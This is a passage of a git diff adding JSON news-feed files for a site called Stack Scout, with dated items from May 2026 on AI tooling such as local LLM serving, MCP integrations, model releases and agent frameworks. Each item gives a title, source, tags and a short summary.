(No idea how much system ram I will get, but I guess they are a bit flexible on this). \\- I want to build a inference endpoint that can handle up to 30 users. \\- I want a fairly reasonable big context, say 131,072-262,144. \\- I think in most situations, realistically speaking, not more than 10-15 users will use it concurrently. \\- Main use for this will be tools like Pi and OpenCode. Was thinking to use Qwen3.6-27B unless anyone can recommend a better one for agentic coding given the constrains. \\- Should I use vllm or llama.cpp? Will llama.cpp able to handle the concurrency? \\- If running on llama.cpp I would probably use UD-Q6\\_K\\_XL or UD-Q8\\_K\\_XL quant from Unsloth. \\- If running on vllm I have no idea on what quant to use? Some advice here would be great. \\- Is there any good tool to benchmark \"concurrent users\"?", + "category": "ai_models" + }, + { + "title": "litellm vs any-llm (otari)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tp6p5j/litellm_vs_anyllm_otari/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-27T14:09:07.000Z", + "summary": "I am considering switching from litellm (sdk) to Mozilla’s [any-llm.](https://github.com/mozilla-ai/any-llm) They also have a proxy to go with it called [otari.](https://github.com/mozilla-ai/otari) On the face of it the repos looks a lot more well kept and stable (had a lot of issues with litellm before). 
Was wondering if others have already done similar and have positive or negative experiences", + "category": "ai_models" + }, + { + "title": "Beating the $100 SDK Credit Cap: Parallel Orchestration and Extended Timeouts in Agent Fleets", + "url": "https://reddit.com/r/ClaudeAI/comments/1tp1476/beating_the_100_sdk_credit_cap_parallel/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-27T10:05:58.000Z", + "summary": "Anthropic’s impending shift to meter programmatic Agent SDK and `claude -p` usage under a rigid monthly credit allowance means developers have to start engineering for extreme token frugality and runtime efficiency. If your workflow engine blocks your entire system every time an agent runs a long file modification, your operational costs and development velocity take a massive hit. Flotilla v0.5.0 completely overhauls its background execution engine to maximize Claude's heavy-lifting potential while shielding your wallet from continuous credit drains: * **Non-Blocking Parallel Loops (v5)**: As mapped out in the blueprint, we swapped out sequential, blocking subprocess calls for an asynchronous process group manager tracking active workflows concurrently via non-blocking `Popen` execution. * **The 30-Minute Claude Safe-Window**: Complex multi-file engineering steps or Claude Code sessions frequently get choked out by standard tool limits. We replaced uniform global process constraints with an explicit per-agent map, extending Claude's runtime allowance to 1800s (30 minutes) to entirely eliminate `SIGTERM` / exit 143 mid-task terminations. 
* **Smart Local Delegation**: To keep you c…", + "category": "ai_tools" + }, + { + "title": "Claude Code has zero idea what your codebase looks like structurally (Open source with benchmarks)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tpbjwo/claude_code_has_zero_idea_what_your_codebase/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.78, + "date": "2026-05-27T16:57:57.000Z", + "summary": "Every time I watch someone use Claude Code on a real codebase, the same thing happens. It rewrites a module that three other modules depend on without any awareness of coupling. It just reads the file, makes changes, moves on It reads files one at a time without any map. Doesn't know which files are coupled. Doesn't know who owns what. Doesn't know why that weird pattern in the auth module exists on purpose. I've been building an open source MCP layer to fix this called repowise. Self-hosted, pip install, AGPL-3.0. Five context layers that sit between your codebase and the model: Graph - AST-based dependency graph. Knows what depends on what before it touches anything. Git - Hotspots, ownership, co-change patterns, bus factor. \"This file always changes with these three other files. Docs - Auto-generated wiki from your code. Searchable. Decisions - Captures architectural intent. Why the code is shaped the way it is. Stops the model from \"fixing\" things that were intentional. Code Health - 12 biomarkers per file. Complexity, duplication, untested hotspots, declining trends. Zero LLM, pure static analysis. 
We ran a time-travel experiment on Django (542 files): scored every file, then…", + "category": "ai_tools" + }, + { + "title": "Millions of AI agents imperiled by critical vulnerability in open source package", + "url": "https://arstechnica.com/information-technology/2026/05/millions-of-ai-agents-imperiled-by-critical-vulnerability-in-open-source-package/", + "source": "Ars Technica AI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.74, + "date": "2026-05-27T05:18:30.012Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "CrankGPT by Squeez Labs - hand-cranked edge AI - talk about local AI!!!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tpm7m3/crankgpt_by_squeez_labs_handcranked_edge_ai_talk/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-27T23:24:48.000Z", + "summary": "I met Katrin from Squeez Labs at an event hosted by Pathway AI (the team behind Baby Dragon Hatchling) where she told me about CrankGPT, a literally hand-cranked device for running local LLMs. It's apparently real. It's appearently launched. It's apparently glorious. Check it out at [https://crankgpt.com/](https://crankgpt.com/) \\- if anyone from Squeez Labs posts here and I'm stealing their thunder, I'll take the post down! But I've been really excited about this. So local you gotta squeez it with yer own armz. 
;) [https://www.youtube.com/watch?v=HSapdLYpmWY](https://www.youtube.com/watch?v=HSapdLYpmWY)", + "category": "ai_models" + }, + { + "title": "BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison [R]", + "url": "https://reddit.com/r/MachineLearning/comments/1tpjx2m/beam_100k_memory_benchmark_csm_vs_hindsight_local/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-27T21:53:42.000Z", + "summary": "\\[R\\] BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison I’m looking for feedback on a local agent-memory benchmark comparison, especially from people who care about evaluation methodology. I built an open-source R&D memory system called Context Swarm Memory (CSM). It uses bounded read-only memory shards, query routing, probe/recall/synthesis, cited packets, and explicit Committer-gated writes. The current comparison is against the accepted local Hindsight artifact on BEAM 100K: * CSM: 0.757573 AMB score, 342 / 400 correct * Hindsight: 0.733658 AMB score, 326 / 400 correct * CSM uses 38.2% fewer answer-visible context tokens * CSM is slower: 29.23s average retrieval vs 6.38s I want to be precise about the claim: This is not an official leaderboard claim. It is not a BEAM 10M claim. It is a committed local accepted-artifact comparison at 100K, and the next step should be independent replication or official chart acceptance. 
Repo: [https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory](https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory) Evidence and reproducibility notes: [https://muhamadjawdatsalemalakoum.github.io/context-swarm-me…", + "category": "ai_research" + }, + { + "title": "Running real-time 1080p video generation and editing on your own (Dreamverse OSS release)", + "url": "https://reddit.com/r/StableDiffusion/comments/1tpfbrl/running_realtime_1080p_video_generation_and/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-27T19:07:02.000Z", + "summary": "Hi guys, FastVideo team here again. Following up on our[ Dreamverse post](https://haoailab.com/blogs/dreamverse/), today we finally cleaned our code up and are excited to say that it's open source! Both the backend and frontend are out, so you can self-host the whole thing. B200s aren't exactly consumer hardware (we know), so the easiest path is to rent one from a cloud GPU provider. Once you've got access, spin up the server and start editing videos in your browser. There's also a mock backend in the repo if you want to hack on the UI without touching a GPU. The release covers the browser workspace, Python runtime for sessions and worker management, fMP4 streaming over websocket, prompt rewriting with safety filters, plus Docker images. The idea is that it can also serve as a sample architecture for anyone building their own real-time video gen apps. One more thing before you go. On the RTX 5090 side, we've gotten Wan2.1 1.3B running in under 2s on a single 5090, and we're working on integrating it into Dreamverse so y'all don't need a B200 to play with this. 
More on that soon :) Repo: [https://github.com/hao-ai-lab/FastVideo/tree/main/apps/dreamverse](https://github.com/hao-ai-l…", + "category": "creative_tools" + }, + { + "title": "Qwen3.6 huge quality gain from Q4 to Q6 for coding agent", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tpebhw/qwen36_huge_quality_gain_from_q4_to_q6_for_coding/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-27T18:32:18.000Z", + "summary": "So, last week I tried to update my unused local LLM setup. I had to stop using it because quality was too low and deepseek was too cheap. First thing I stopped using Ollama and now I only use llama.cpp built in server that works really great. The quality improvement from Q4 to Q6 is outstanding and finally a local LLM server can work very similarly to paid APIs. That's great! And MTP makes a big performance gain, on a dual 3090 (downvolted and limited to 65°C) it generates from 20 to 50 tokens per second with minimal heat generation. So yes, that time has finally arrived! 
Local coding agents are a thing and they work 😎", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-28.json b/data/news-feed-2026-05-28.json new file mode 100644 index 0000000..e434f79 --- /dev/null +++ b/data/news-feed-2026-05-28.json @@ -0,0 +1,271 @@ +{ + "generated": "2026-06-05T00:44:44.425Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-28", + "article_count": 15, + "archived_story_count": 714, + "articles": [ + { + "title": "Claude Code 2.1.153 Open Changelog Reflects Anthropic's Transparent Developer Tooling Strategy", + "url": "https://x.com/ClaudeCodeLog/status/2059802880811434228", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-28T12:12:48.493Z", + "summary": "Anthropic's commitment to publishing detailed Claude Code changelogs with every release enables developers to track improvements and plan migrations. Version 2.1.153 with 36 CLI changes reflects rapid iteration in the agentic coding space.", + "category": "ai_tools" + }, + { + "title": "I built and open-sourced Skill Index to organize & standardize your AI agent knowledge across Claude, Codex, Cursor, and more. 100% local and free on macOS.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tprx27/i_built_and_opensourced_skill_index_to_organize/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-28T03:36:12.000Z", + "summary": "I’ve been using Claude alongside other coding agents, and I kept running into the same problem: useful skills, MCPs, commands, hooks, and workflows start getting scattered across different tools. Sometimes Claude has the best version of something. Sometimes Codex or Cursor does. 
Sometimes an MCP is configured in one agent but missing or slightly different in another. Over time, it gets harder to treat your agent knowledge as one reusable system. So I built Skill Index: a free, open-source, 100% local macOS app for organizing and standardizing AI agent knowledge. The goal is to make it easier to bring reusable skills/MCPs/agent knowledge into Claude, while also keeping Claude’s own knowledge portable across the rest of your setup. It can help you: \\- see where your skills and MCPs live \\- compare what Claude, Codex, Cursor, Windsurf, and other agents can access \\- standardize around a canonical definition of each skill/MCP \\- keep your skills and MCPs in sync across every agent It’s local-first: no accounts, no cloud sync, no telemetry. Website: [https://skillindex.app](https://skillindex.app) GitHub: [https://github.com/arjitj2/skillindex](https://github.com/arjitj2/skillindex)", + "category": "ai_tools" + }, + { + "title": "MCP Servers / Connectors in Claude Desktop / Cowork via AWS Bedrock", + "url": "https://reddit.com/r/ClaudeAI/comments/1tpxskx/mcp_servers_connectors_in_claude_desktop_cowork/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool", + "cli_tool" + ], + "importance": 0.78, + "date": "2026-05-28T08:48:48.000Z", + "summary": "While using MCP servers in the code CLI works with MCP servers, I'm having trouble using connectors or MCP servers in Cowork. Connecting to Jira or O365 seems not possible. With Bedrock, we don't have the Chat, but only the Cowork tab and also some additional settings are missing. I tried configuring the claude\\_desktop\\_config.json with MCP servers, but cowork doesn't seem to be able to use it. I can Import a manual plugin, but after a restart it seems gone and configuring it in cowork is not possible, the authentication doesn't work. 
Did anyone manage to get Connectors / MCP Servers / Plugins in Claude Desktop with Bedrock to work, and if so, how?", + "category": "ai_tools" + }, + { + "title": "Introducing Claude Opus 4.8", + "url": "https://reddit.com/r/ClaudeAI/comments/1tq99mu/introducing_claude_opus_48/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 1, + "date": "2026-05-28T16:52:23.000Z", + "summary": "We’re upgrading Claude Opus to a new version: Claude Opus 4.8. It builds on Opus 4.7 with sharper judgment, more honesty about its own progress, and the ability to work independently for longer than its predecessors. Available today for the same price. In Claude Code, you can hand off a feature, a migration, or a bug sweep and let it follow the work through while you focus on what’s next. Also launching today: * Fast mode for Opus 4.8 (research preview). Same model at roughly 2.5x the speed, now three times cheaper than before. * Dynamic workflows in Claude Code (research preview). Claude runs hundreds of parallel subagents in a single session and verifies its work before reporting back. * A new effort control on [claude.ai](http://claude.ai), so you can choose how much thinking Claude puts into a response. Claude Opus 4.8 is live today on [claude.ai](http://claude.ai), the Claude Platform, and all major cloud platforms. 
Read more: [anthropic.com/news/claude-opus-4-8](http://anthropic.com/news/claude-opus-4-8)", + "category": "ai_tools" + }, + { + "title": "I built an enforcement layer for AI coding agents using a local knowledge graph and hybrid RAG", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tq6sd0/i_built_an_enforcement_layer_for_ai_coding_agents/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-28T15:23:21.000Z", + "summary": "I know this sub is focused on local models but the architecture behind this applies to any LLM-powered coding agent, not just Claude Code. The problem: when you give a coding agent a large set of rules and standards, two things break. The context fills up with rules that aren't relevant to the current task, and nothing enforces compliance. The agent reads your instructions and decides what to follow. I built Writ to solve both. The knowledge layer: rules, skills, techniques, antipatterns, and playbooks live as nodes in a Neo4j knowledge graph with typed relationships between them. A five stage retrieval pipeline (BM25 over Tantivy, vector similarity over HNSW with a local ONNX embedding model, graph traversal, reciprocal rank fusion, context budget management) retrieves only what's relevant per task. Everything runs locally. No API calls for retrieval. The embedding model (all-MiniLM-L6-v2) runs through ONNX runtime, not PyTorch, so inference is fast without a GPU. The enforcement layer: 30 bash hook scripts intercept tool calls before execution. The agent can't write code without an approved plan, can't skip tests, can't say \"tests pass\" without running static analysis. These are…", + "category": "ai_models" + }, + { + "title": "Kept context-switching between arxiv, OpenReview, GitHub, and HuggingFace for every paper, so I built this. 
Chrome extension + website with everything inline, plus citation graph + SPECTER2 neighbors. 3M papers, free, feedback welcome [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tq53il/kept_contextswitching_between_arxiv_openreview/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-28T14:21:49.000Z", + "summary": "Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com/) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use?", + "category": "ai_research" + }, + { + "title": "Built a richer reading layer for arxiv (Chrome extension + web): OpenReview reviews, GitHub/HuggingFace links, citation graph, SPECTER2 neighbors, TLDRs. 
3M papers, free, looking for feedback [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tq31yu/built_a_richer_reading_layer_for_arxiv_chrome/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-28T13:05:39.000Z", + "summary": "Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use?", + "category": "ai_research" + }, + { + "title": "SDXL image generation now works on iPhone. 
The bug that blocked it for months was a missing file check", + "url": "https://reddit.com/r/StableDiffusion/comments/1tq302b/sdxl_image_generation_now_works_on_iphone_the_bug/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-28T13:03:34.000Z", + "summary": "We've been building \\[Off Grid\\](https://github.com/alichherawalla/off-grid-mobile-ai) - open-source app for on-device AI (text + image gen, no cloud). SDXL on iPhone was broken for months. Users kept reporting it, we couldn't reproduce it consistently. Turns out: SDXL models ship in two UNet layouts: \\- Monolithic: one big \\`Unet.mlmodelc\\` file \\- Chunked: \\`UnetChunk1.mlmodelc\\` + \\`UnetChunk2.mlmodelc\\` Our validation code only checked for the monolithic layout. If you downloaded a chunked SDXL model (which most are), the app said \"model invalid\" and refused to load it. Months of reports. The fix was adding the chunked layout check — straightforward once we understood the problem. The app uses Apple's ml-stable-diffusion framework with CoreML. On an iPhone 15 Pro, you get SDXL images in about 30-45 seconds fully on-device. No internet needed at any point - the model lives on your phone. 
It's free and open source: \\- GitHub: [https://github.com/alichherawalla/off-grid-mobile-ai](https://github.com/alichherawalla/off-grid-mobile-ai) \\- iOS: [https://apps.apple.com/us/app/off-grid-local-ai/id6759299882](https://apps.apple.com/us/app/off-grid-local-ai/id6759299882) \\- Android (SD…", + "category": "creative_tools" + }, + { + "title": "DSPy v3.3.0 Beta Brings ReActV2 to Open-Source AI Programming Framework", + "url": "https://x.com/isaacbmiller1/status/2059828079371894786", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-28T12:12:48.493Z", + "summary": "Stanford's DSPy framework released v3.3.0 beta on PyPI with ReActV2, improved LM/BaseLM architecture, and RLM data-passing support. DSPy is widely used for structured programming with language models in both research and production.", + "category": "ai_tools" + }, + { + "title": "Tencent WorkBuddy Global Launch Brings China's Top Desktop AI Agent to International Markets", + "url": "https://x.com/TencentAI_News/status/2059827192964808922", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-28T12:12:47.642Z", + "summary": "Tencent's WorkBuddy desktop AI agent — already China's market leader — launches worldwide with autonomous handling of coding, analysis, and productivity tasks. 
The global launch challenges Microsoft Copilot, Cursor, and other Western enterprise AI assistants on their home turf.", + "category": "ai_tools" + }, + { + "title": "Local run for multi users: which software set?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tq0cj7/local_run_for_multi_users_which_software_set/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-28T11:06:34.000Z", + "summary": "Context: I am testing and running local LLM on Linux for some months, first with llama.cpp and now with vLLM for better concurrent capabilities. I use llama-swap in front of either vLLM or llama.cpp in order to have thinking and non-thinking variants exposed with all inference parameters adjusted according to the model requirements. My needs: now, I would like to make the LLM available to multiple (less than 10) users, outside from the local network: https access, web chat interface with either connection or api-key, API access with api-key. What I tried: * apache as frontend proxy: handle SSL part and redirect to internal applications as unsecured connections. * LibreChat as web user interface * llama-swap * vLLM Observed problems: * concurrency is limited to 10 requests (llama-swap limitation, either find how to raise this value or good alternative) * LibreChat only gives web interface, still need API access with keys management. Which open source software set do you use to serve multiple users? Do you know simple keys management tools? Did I miss something? 
Thank for any help!", + "category": "ai_models" + }, + { + "title": "OpenAI releases secure tunnels to connect private Model Context Protocol servers without modifying inbound firewallsOutbound-only HTTPS tunnels secure the connection to OpenAI.", + "url": "https://www.digg.com/ai/28n5w7d2", + "source": "Digg AI", + "tags": [ + "mcp", + "product_launch" + ], + "matching_tags": [ + "mcp", + "product_launch" + ], + "importance": 1, + "date": "2026-05-28T05:18:10.307Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Genesis AI launches Genesis World 1.0, an open-source robotics simulator that turns one hour of real-world testing into 100 simulation daysIt features GPU-accelerated physics solvers and path-traced rendering", + "url": "https://www.digg.com/ai/tuo1sird", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-28T05:18:10.290Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Vulnerability found in framework used by VLLM, many MCP servers, and other LLM tools", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tpp2th/vulnerability_found_in_framework_used_by_vllm/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-28T01:27:29.000Z", + "summary": "Worth taking a look to see if this affects any of you. Surprised nobody has posted it yet.", + "category": "ai_models" + }, + { + "title": "GH200 NVL2 or 8x RTX 6000 Blackwell for running Kimi K2.6 / DeepSeek V4 locally? 
(5 devs, agentic coding)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tpp0a7/gh200_nvl2_or_8x_rtx_6000_blackwell_for_running/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-28T01:24:20.000Z", + "summary": "Trying to figure out the right box for my team and wanted to see if anyone had any clue which would be a better fit or if it is not worth our time in our budget. Situation: 5 of us doing agentic coding (lots of long context getting re-sent every turn, parallel tool calls, etc.) and we want to self-host the latest open MoE models — Kimi K2.6 and DeepSeek V4 class. My boss likes the idea of having it in house so no point in just saying pay the API (I did pitch that) Budget is around $100k - $150k. I'm stuck between a dual GH200 NVL2 (cheaper, \\~1.2TB unified memory) (about 95k) and an 8x RTX 6000 Pro Blackwell build (768GB of actual fast VRAM, more expensive) (about 140k). To get real numbers I rented a single GH200 and tested Kimi K2.6 at a 2-bit quant. After some playing around I got it up to \\~23 tok/s decode, which is not bad considering it is one GH200 with only 96gb of HBM, but I am not sure how it will scale to the dual GH200. The prefill was pretty slow yet again not sure how it will scale. The thing I keep coming back to: these models are too big to fit in HBM no matter what. 
Even the NVL2's 288GB HBM3e can't hold them, so the model partially lives in the slower unified mem…", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-29.json b/data/news-feed-2026-05-29.json new file mode 100644 index 0000000..f69c931 --- /dev/null +++ b/data/news-feed-2026-05-29.json @@ -0,0 +1,259 @@ +{ + "generated": "2026-06-05T00:44:44.652Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-29", + "article_count": 15, + "archived_story_count": 468, + "articles": [ + { + "title": "Runway Exposes Gen-4.5, Kling, and GPT Image 2 via MCP — Creative Models Now Callable Inside Claude, Cursor, and Replit Agents", + "url": "https://x.com/runtimewire/status/2059782827927810437", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-29T12:05:45.033Z", + "summary": "Runway plugged its creative model suite into Claude, ChatGPT, Cursor, and Replit via MCP, making image and video generation callable directly inside AI agent workflows. Runway Gen-4.5, Kling, and GPT Image 2 are all exposed through the integration.", + "category": "ai_tools" + }, + { + "title": "Kling AI Skill Launches for Agent Workflows — Text-to-Video, 4K Images, and Cross-Scene Consistency in Claude and Cursor", + "url": "https://x.com/MayorKingAI/status/2044455291664695688", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-29T12:05:45.033Z", + "summary": "Kling AI launched a dedicated Skill for AI agent workflows, enabling text/image to video generation, 4K image generation, style transfer, and cross-scene consistency with custom elements. 
Works natively with Claude, Cursor, Copilot, Codex, and OpenClaw.", + "category": "ai_tools" + }, + { + "title": "Motion Launches Motion API — Connect the AI Motion Design Tool Directly Into Claude, Codex, OpenClaw, and Hermes", + "url": "https://x.com/_adishj/status/2060028771399500237", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "matching_tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-28T17:59:08.283Z", + "summary": "Motion released the Motion API, enabling one-click integration of the AI motion design tool directly into Claude, Codex, OpenClaw, Hermes, and other AI frameworks. Agents can now generate motion design content as part of automated creative workflows.", + "category": "ai_tools" + }, + { + "title": "X Square Robot Releases Open-Source WALL-WM World Model For Embodied AI", + "url": "https://www.digg.com/ai/v4d0ka2f", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.045Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Anthropic Releases Opus 4.8 With Strong Agentic Coding Benchmarks", + "url": "https://www.digg.com/ai/6gzrebez", + "source": "Digg AI", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.038Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "ElevenLabs Launches Dubbing V2 — SOTA Audio-to-Audio Dubbing That Preserves Emotion in 90+ Languages", + "url": "https://x.com/Carles_Reina/status/2060035887946248616", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-28T17:59:08.282Z", + "summary": "ElevenLabs 
introduced Dubbing V2, described as the world's state-of-the-art model for high-quality dubbing. The Audio-to-Audio model preserves the original speaker's emotion and intent across 90+ languages. Available now through ElevenCreative, with API access coming soon.", + "category": "ai_tools" + }, + { + "title": "Hexo Releases SIA — Open-Source Self-Improving AI That Updates Its Own Weights During Goal Pursuit", + "url": "https://x.com/kunalbhatia91/status/2060013228231725092", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-28T17:54:34.974Z", + "summary": "Hexo released SIA, an open-source Self-Improving AI that achieves goals through recursive self-improvement — updating its own capabilities as it works toward a goal, not just calling tools with fixed capabilities. The announcement earned 221 likes and 80,000 views.", + "category": "ai_tools" + }, + { + "title": "Shift Launches in NYC — AI Economy Startup Offers Free Home Cleaning to Bridge Today's Economy to the AI Abundance Era", + "url": "https://x.com/bercankilic/status/2060043312606638245", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-28T17:49:05.507Z", + "summary": "Shift launched in New York City with a mission to bridge the current economy into the AI economy where goods, services, and leisure become affordable through AI. 
The launch includes free home cleaning as the entry product.", + "category": "ai_tools" + }, + { + "title": "minWM: A Full-Stack Open-Source Framework for Real-Time Interactive Video World Models", + "url": "https://paperswithcode.com/papers/2605.30263", + "source": "Papers With Code", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.9, + "date": "2026-05-29T15:24:25.298Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "DeepSeek's Deli Chen releases an LLM continual learning survey paper generated autonomously by the DeliAutoResearch systemIt maps out self-improvement methods like STaR and o1.", + "url": "https://www.digg.com/ai/xay55qwq", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.054Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "ElevenLabs Releases Dubbing V2 With Emotion-Preserving Multilingual Audio", + "url": "https://www.digg.com/ai/hsa7ykbd", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.027Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "OpenAI launches Rosalind Biodefense, giving U.S. 
